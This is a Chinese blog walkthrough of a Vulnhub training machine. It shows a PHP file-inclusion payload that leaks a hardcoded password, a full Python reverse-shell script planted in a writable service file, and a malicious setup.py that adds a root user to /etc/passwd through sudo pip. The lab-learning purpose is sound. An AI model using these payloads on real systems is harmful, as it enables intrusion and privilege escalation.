带妹玩转Vulnhub【七】

最新推荐文章于 2024-06-28 10:07:42 发布
最新推荐文章于 2024-06-28 10:07:42 发布
阅读量1.3k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33438733/article/details/82915408
版权

前言

国庆第一天,不太想撩妹,再写点东西,增加点产量,严肃脸?

开始

主机发现

netdiscover -r 192.168.43.0/24

在这里插入图片描述

端口扫描

nmap -A -p- -T4 192.168.43.76
在这里插入图片描述

渗透测试

子目录扫描

在这里插入图片描述

访问80,扫到的每个页面都看一下,以及源代码。

在这里插入图片描述

可以知道作者为mamadou
而且这里存在文件包含漏洞(现学现卖)参考链接

经过各种尝试,最终使用如下payload
http://192.168.43.76/?lang=php://filter/convert.base64-encode/resource=index

可以得到一段base64加密代码,这应该就是index.php的源代码

PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=

这里除了可以通过正常访问网页来获取代码,也可以使用curl工具。
命令如下curl http://192.168.43.76/?lang=php://filter/convert.base64-encode/resource=index

这样便可以较为方便得到base64加密的代码

解密后得到

<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="Vibranium market">
    <meta name="author" content="mamadou">

    <title>Vibranium Market</title>


    <link href="bootstrap.css" rel="stylesheet">

    
    <link href="cover.css" rel="stylesheet">
  </head>

  <body class="text-center">

    <div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
      <header class="masthead mb-auto">
        <div class="inner">
          <h3 class="masthead-brand">Vibranium Market</h3>
          <nav class="nav nav-masthead justify-content-center">
            <a class="nav-link active" href="#">Home</a>
            <!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
          </nav>
        </div>
      </header>

      <main role="main" class="inner cover">
        <h1 class="cover-heading">Coming soon</h1>
        <p class="lead">
          <?php
            if (isset($_GET['lang']))
          {
          echo $message;
          }
          else
          {
            ?>

            Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned!
            <?php
          }
?>
        </p>
        <p class="lead">
          <a href="#" class="btn btn-lg btn-secondary">Learn more</a>
        </p>
      </main>

      <footer class="mastfoot mt-auto">
        <div class="inner">
          <p>Made by<a href="#">@mamadou</a></p>
        </div>
      </footer>
    </div>
</body></html>

从源代码中很明显的可以看到一个文件包含漏洞,并且获得了密码Niamey4Ever227!!!,尝试ssh登陆,得到一个python的shell

在这里插入图片描述

通过一些简单的代码,便可以获得tty
import pty
pty.spawn("/bin/bash")

在这里插入图片描述

很轻易的可以发现几个falg,但是有一个我们当前用户似乎没有权限。

在这里插入图片描述

我尝试全局搜索flag关键字,这里提到一个搜索的技巧
find / -name flag 2>/dev/null 这样就可以避免很多报错
我尝试查看devops用户所在的组:

在这里插入图片描述

就我们现在手里所拥有的信息来看,想要爆破出devops用户的密码似乎不太可能。但是可以看到devops用户和组号是不同的,因此我们可以尝试往1002组中添加一个用户。

因此我们尝试搜索所属1002组的文件
find / -group 1002 2>/dev/null

在这里插入图片描述
这里发现一个十分可疑的文件/srv/.antivirus.py,该文件对其他用户是可读写的,并且我们可以使用pyhton运行一个脚本。

在这里插入图片描述

因此我们完全可以写一个反向shell,这样我们便拥有了devops用户的权限,这大概就是因为权限设置错误而导致大致命问题吧!
代码如下:
参考链接

#!/usr/bin/python2
"""
Reverse Connect TCP PTY Shell - v1.0
infodox - insecurety.net (2013)

Gives a reverse connect PTY over TCP.

For an excellent listener use the following socat command:
socat file:`tty`,echo=0,raw tcp4-listen:PORT

Or use the included tcp_pty_shell_handler.py
"""
import os
import pty
import socket

lhost = "127.0.0.1" # XXX: CHANGEME
lport = 31337 # XXX: CHANGEME

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((lhost, lport))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()
	
if __name__ == "__main__":
    main()

我们需要使用devops用户运行该python代码,要知道服务器上不会平白无故出现一些不该出现的文件,我们继续搜索

grep -rnw / -e '.antivirus.py' 2>/dev/null

在这里插入图片描述

似乎antivirus.service服务会运行该脚本,我们使用nc -lvp 2333监听2333端口,过一会便自动连接上了(本来我还想重启该服务,看来是不需要了?)

在这里插入图片描述

这样我们便拿到了一个flag

在这里插入图片描述

仅仅拥有devops用户的权限还远不够,我们需要获取root权限,才能达到终极目的。
通过sudo -l,我们可以知道该用户可以使用root权限运行pip命令,这真是令人又惊又喜。

在这里插入图片描述

就我们熟悉的,可以使用pip setup.py install命令来安装一个模块,那么我们完全可以模仿着写一个。
参考链接
代码如下:

#!/usr/bin/python
#Rename to setup.py before use
#Run: sudo /usr/bin/pip install . --upgrade --force-reinstall
#Get root shell: su delo
#password is dsrrocks
from setuptools import setup
from setuptools.command.install import install
import os

class CustomInstall(install):
    def run(self):
        install.run(self)
        os.system('echo delo:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh >> /etc/passwd')

setup(name='delopip',
      version='1.1.1',
      description='exploit sudo pip permissions',
      url='https://github.com/delosec',
      author='delo',
      author_email='delo@sec.com',
      license='MIT',
      zip_safe=False,
      cmdclass={'install':CustomInstall})

我们可以使用python内置的http服务器开启一个文件服务
python -m SimpleHTTPServer 8080

在这里插入图片描述

成功运行sudo /usr/bin/pip install . --upgrade --force-reinstall后,我们便将delo用户添加到root用户组了。

在这里插入图片描述

而后我们可以使用su delo进行登陆,此时的我即具备了root权限。

在这里插入图片描述

#总结
该靶场让我更加深入的理解了,对于linux系统权限配置的重要性,原来一个不小心权限的滥用,会最终导致root权限被攻克,看来以后在打awd可以仔细的思考下?主办方的权限配置问题了!?

今天没有妹子的告白
带妹是不可能带妹的,这辈子都不可能带妹的。?

坚强的女程序员
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
带妹玩转Vulnhub【二】
BadRer的博客
09-27 1078
前言 今天还是没有妹子主动来找我,一怒之下再写一篇,以此祭天!哼!QAQ 带妹是不可能带妹的,这辈子都不可能带妹
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7617
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹
Vulnhub靶机-PumpkinFestival
ergeLXT的博客
06-28 612
需要修改本地hosts文件之后进行访问,添加pumpkins.local到hosts文件之后访问。使用 echo 命令创建一个名为alohomora的文件,其中复制了/bin/bash。本机尝试,在本机ftp登录靶机,拿到data,解压,解密到key(2)文件,然后ssh登录。登录名为admin的wp-admin用户,在得到令牌二的时候获取到一个关键字。在上面的目录中除token.txt之外,还有一个NOOOOO目录,继续访问。有一个NO目录,继续访问,经过多次遍历,找到token.txt。
带妹玩转Vulnhub【三】
BadRer的博客
09-30 990
前言 今天妹子终于主动来找我说话了!哈哈哈哈
带妹玩转Vulnhub【四】
BadRer的博客
10-01 816
前言 今天我们请到了炫酷的女装大佬,和我一起为大家进行讲解,这次就不带妹子玩了,毕竟有女装大佬,真香!
带妹玩转Vulnhub【五】
BadRer的博客
10-01 765
前言 今天晚上听说炫酷的女装大佬国庆期间要出去旅游,不能带我飞,很伤心
带妹玩转Vulnhub【六】
BadRer的博客
10-01 484
前言 今晚的第二篇,没有什么要讲的,让我们好好的来排练一遍。 开始 主机发现 netdiscover -r 192.168.43.0/24 端口扫描 nmap -A -p- -T4 192.168.43.132 渗透测试 一个登陆页面,目录扫描肯定还有些东西 很快我们便可以得到第一个flag 以及一些关键的信息 当我开始尝试访问http://192.168.43.132/uploade...
带妹玩转Vulnhub【十二】
BadRer的博客
10-06 731
前言 国庆第六天œ∑´,简单写了。 一曲成都送给你 开始 主机发现 netdiscover -r 192.168.43.0/24 端口扫描 nmap -A -p- -T4 192.168.43.120 渗透测试 查看一下源码 sqlmap尝试注入qlmap -u "http://192.168.43.120" --data "un=admin&amp;ps=admin&amp;login=...
带妹玩转Vulnhub【十一】
BadRer的博客
10-04 548
前言 国庆第四天œ∑´ 千金散尽还复来 开始 主机发现 netdiscover -r 192.168.43.0/24 端口扫描 nmap -A -p- -T4 192.168.43.232 渗透测试 80端口查看,emm没什么发现,针对smb服务我们可以使用enum4linux进行扫描,同样的使用dirb扫描一下目录 可以看到backup目录,可以看到这应该是个网站的源码,下载下来,但...
带妹玩转Vulnhub【十】
BadRer的博客
10-04 317
前言 国庆第三天!接下来会写的比较的粗略。 生活越来越无助,哪位师傅能施舍点活 开始 主机发现 netdiscover -r 192.168.43.0/24 端口扫描 nmap -A -p- -T4 192.168.43.7 渗透测试 从端口中可以看到很多信息,目标服务器开起来三个web服务,我们优先查看泄露信息最多的那个也就是8081端口,这是一个Joomlal开源框架,我们可以使用J...
vulnhub-Nagini.txt
06-10
Nagini
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
基于SpringCloud微服务架构的B2C电子商务系统-可执行内含文档代码-可执行内含文档代码.zip
07-28
基于SpringCloud微服务架构的B2C电子商务系统-可执行内含文档代码-可执行内含文档代码.zip
智慧校园整体解决方案-6PPT(102页).pptx
07-28
智慧校园整体解决方案是响应国家教育信息化政策,结合教育改革和技术创新的产物。该方案以物联网、大数据、人工智能和移动互联技术为基础,旨在打造一个安全、高效、互动且环保的教育环境。方案强调从数字化校园向智慧校园的转变,通过自动数据采集、智能分析和按需服务,实现校园业务的智能化管理。 方案的总体设计原则包括应用至上、分层设计和互联互通,确保系统能够满足不同用户角色的需求,并实现数据和资源的整合与共享。框架设计涵盖了校园安全、管理、教学、环境等多个方面,构建了一个全面的校园应用生态系统。这包括智慧安全系统、校园身份识别、智能排课及选课系统、智慧学习系统、精品录播教室方案等,以支持个性化学习和教学评估。 建设内容突出了智慧安全和智慧管理的重要性。智慧安全管理通过分布式录播系统和紧急预案一键启动功能,增强校园安全预警和事件响应能力。智慧管理系统则利用物联网技术,实现人员和设备的智能管理,提高校园运营效率。 智慧教学部分,方案提供了智慧学习系统和精品录播教室方案,支持专业级学习硬件和智能化网络管理,促进个性化学习和教学资源的高效利用。同时,教学质量评估中心和资源应用平台的建设,旨在提升教学评估的科学性和教育资源的共享性。 智慧环境建设则侧重于基于物联网的设备管理,通过智慧教室管理系统实现教室环境的智能控制和能效管理,打造绿色、节能的校园环境。电子班牌和校园信息发布系统的建设,将作为智慧校园的核心和入口,提供教务、一卡通、图书馆等系统的集成信息。 总体而言,智慧校园整体解决方案通过集成先进技术,不仅提升了校园的信息化水平,而且优化了教学和管理流程,为学生、教师和家长提供了更加便捷、个性化的教育体验。
anaconda配置pytorch环境.pdf
最新发布
07-28
使用Anaconda配置PyTorch环境是一个相对直接的过程,以下是一个详细的步骤指南,包括Anaconda的下载与安装、PyTorch环境的创建以及PyTorch的安装与验证。 一、Anaconda的下载与安装 1.访问Anaconda官网: 1.前往Anaconda官网下载最新版本的Anaconda。 2.下载Anaconda: 1.在官网首页,点击“Free Download”按钮,选择合适的操作系统版本进行下载。 3.安装Anaconda: 1.双击下载好的Anaconda安装包,按照提示进行安装。 2.注意选择安装路径(建议不安装在C盘),并确保安装路径为全英文。 3.安装过程中,根据需要选择“为所有用户安装”或“仅为当前用户安装”。 4.验证Anaconda安装: 1.安装完成后,打开“Anaconda Prompt”(或Anaconda Navigator),输入conda --version查看conda版本,以验证Anaconda是否安装成功。 二、创建PyTorch环境 1.打开Anaconda Prompt: 1.在开始菜单中找到并打开“Anaconda Pro
vulnhub sar
09-09
vulnhub sar是一个类似OSCP的虚拟机,它旨在帮助用户提高和巩固渗透测试的知识点。如果你想下载sar靶机,你可以在GitHub上找到它,具体来说,你可以在pentestmonkey的php-reverse-shell存储库中找到它。如果你已经...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值